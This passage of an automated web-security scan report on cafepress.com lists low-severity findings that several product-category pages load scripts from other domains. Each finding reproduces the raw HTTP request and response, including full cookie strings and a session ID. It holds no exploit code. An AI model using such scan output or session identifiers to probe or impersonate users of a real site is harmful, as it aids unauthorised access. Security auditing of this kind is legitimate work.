GET /+hats-caps HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59393 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.21. http://www.cafepress.com/+ipad-cases
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ipad-cases
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 88266 Date: Sun, 26 Dec 2010 13:44:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.22. http://www.cafepress.com/+iphone-cases
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+iphone-cases
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content5.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 65212 Date: Sun, 26 Dec 2010 13:48:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65212 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content5.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.23. http://www.cafepress.com/+journals
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+journals
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+journals HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59322 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59322 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content0.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.24. http://www.cafepress.com/+keepsake_boxes
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+keepsake_boxes
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+keepsake_boxes HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 59018 Date: Sun, 26 Dec 2010 13:48:41 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59018 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.25. http://www.cafepress.com/+license_plate_frames
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+license_plate_frames
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+license_plate_frames HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59931 Date: Sun, 26 Dec 2010 13:48:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59931 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.26. http://www.cafepress.com/+magnets
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+magnets
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
